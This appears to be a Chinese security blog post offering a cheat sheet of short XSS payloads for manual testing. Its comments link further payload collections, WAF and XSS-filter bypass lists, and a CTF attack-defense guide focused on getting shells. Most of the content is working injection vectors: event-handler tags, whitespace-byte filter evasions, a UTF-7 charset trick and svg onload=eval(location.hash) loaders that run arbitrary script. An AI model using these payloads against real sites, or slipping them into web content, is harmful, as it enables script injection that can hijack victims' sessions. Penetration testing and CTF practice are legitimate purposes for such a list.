Payloads

在测试XSS等漏洞的过程中可能会需要手工进行一些尝试，了解并熟练使用常见/有效的payload是很有必要的，于是从大牛们的分享中提取出了一些简短的payload方便输入/测试：

1.XSS（从Mramydnei大牛分享出的文档中提取）

<img src=1.png onload=alert(7)>
<style onload=alert(8)>
<input src=1.png type="image" onload=alert(3)>
<script src=0.js onerror=alert(1)></script>
<script src=1.js onload=alert(5)></script>
<listing>&ltimg src=x onerror=alert(32)&gt</listing>

<img onerror=MsgBox+9 language=vbs src=a>
<img onerror=MsgBox+8 language=vbscript src=a>

====
<svg[0X09]onload=alert()>
<svg[0X0A]onload=alert()>
<svg[0X0C]onload=alert()>
<svg[0X0D]onload=alert()>
<svg[0X020]onload=alert()>
<svg[0X2F]onload=alert()>
====

<meta http-equiv="content-type" content="text/html;charset=utf-7"> +ADw-script+AD4-alert(123); +ADw-/script+AD4-

<svg/onload=eval(location.hash.slice(1))>
<svg/onload=eval(location.hash.substr(1))>
<svg/onload=eval(location.hash.split('#')[1])>
<svg><g onload=alert(55)>
<svg onload=alert(54)>

<image src=1 onerror=alert(53)>
<b/ondrag=alert()>x
<audio src=x onerror=alert(51)>

<frameset onload=alert(40)>
<select onfocus=alert(36) autofocus>
<textarea onfocus=alert(37) autofocus>
<keygen onfocus=alert(38) autofocus>
<input onfocus=alert(33) autofocus>

<iframe/onload=alert(document.domain)></iframe>

<body/onload=alert(25)>
<img src=x onerror=alert(24)>
<a onclick=alert(18)>M
<a onmouseover=alert(17)>M

===DOM===
<input onclick="document.write('&lt;img src=x onerror=alert(1)&gt;');">
<input onclick="document.write('&lt;img src=x onerror=alert(1)&gt;');">

2.SQL注入

……待添加……

3.待添加……

《 “Payloads” 》有 11 条评论

a-z说道：

2016-12-02 11:38

大量XSS攻击向量
https://84692bb0df6f30fc0687-25dde2f20b8e8c1bda75aeb96f737eae.ssl.cf1.rackcdn.com/–xss.html

回复
a-z说道：

2017-02-21 19:41

一些绕过WAF和渗透/CTF用的有效payload
https://github.com/swisskyrepo/PayloadsAllTheThings

回复
a-z说道：

2017-04-05 15:20

XSS Payload 收集（约有 1500 左右）
https://sql–injection.blogspot.com.tr/p/blog-page_80.html

回复
a-z说道：

2017-07-21 11:00

CTF Wiki 是一个免费开放且持续更新的知识整合站点，你可以在这里学到关于 CTF 竞赛及网络安全相关的有趣知识
https://ctf-wiki.github.io/ctf-wiki/#/introduction

回复
- a-z说道：
  
  2017-10-14 19:49
  
  CTF-All-In-One
  https://firmianay.gitbooks.io/ctf-all-in-one/content/
  
  回复
a-z说道：

2017-07-28 22:55

将所有收集到的和Web攻击相关的payload放在GitHub上(Git All the Payloads! A collection of web attack payloads.)
https://github.com/foospidy/payloads

回复
a-z说道：

2017-08-11 19:32

XXE_payloads(Collection of XXE payloads)
https://gist.githubusercontent.com/staaldraad/01415b990939494879b4/raw/17c342a7fcdcba37de7cbfd41a001e753db4d200/XXE_payloads

回复
a-z说道：

2018-01-29 13:39

常用 XSS Payload Top 500 列表
https://gbhackers.com/top-500-important-xss-cheat-sheet/

回复
hi说道：

2018-04-26 20:05

xss-payload-list – XSS Payload 收集
https://github.com/ismailtasdelen/xss-payload-list

回复
hi说道：

2019-02-12 19:29

浏览器 XSS Filter 绕过速查表
https://github.com/masatokinugawa/filterbypass

回复
hi说道：

2019-05-13 11:15

CTF线下攻防指南
http://blog.nsfocus.net/ctf-off-line-attack-defense-guidelines/
https://paper.tuisec.win/detail/f2cf0e4b0f4e92d
`
CTF线下攻防赛主要以攻防模式（Attack & Defense）来呈现。一般在这种模式下，一支参赛队伍有三名队员，所有的参赛队伍都会有同样的初始环境，包含若干台服务器。参赛队伍挖掘漏洞，通过攻击对手的服务器获取Flag来得分，以修补自身服务器的漏洞防止扣分。

攻防模式可以通过实时得分反映出比赛情况，是一种竞争激烈，具有很强观赏性和高度透明性的网络安全赛制。在这种赛制中，不仅仅是比参赛队员的智力和技术，同时也比团队之间的分工配合与合作。

在线下攻防模式中一定要掌握以下几点。
1.对于浏览器的使用。
大部分漏洞都是网上可查的，所以一个好的搜索技巧是十分重要的。

2.对于漏洞的反应能力。
攻防模式中一般都需要GetShell，所以一定要多关注可以RCE的点。

3.脚本的编写能力。
在getshell之后拿到了Flag，如果有50个队，5分钟刷新一次Flag的话通过手动提交会使得一个队员只能提交Flag，而且还可能会Down掉，所以如果有一个可以快速编写脚本的人那就再好不过了。

4.好的心态。
服务Down掉不要慌，心态不要崩，崩了就什么都没有了。
`

回复

ASPIRE

Payloads

1.XSS（从Mramydnei大牛分享出的文档中提取）

2.SQL注入

3.待添加……

《 “Payloads” 》有 11 条评论

发表回复取消回复

Payloads

1.XSS（从Mramydnei大牛分享出的文档中提取）

2.SQL注入

3.待添加……

《 “Payloads” 》 有 11 条评论

发表回复 取消回复

《 “Payloads” 》有 11 条评论

发表回复取消回复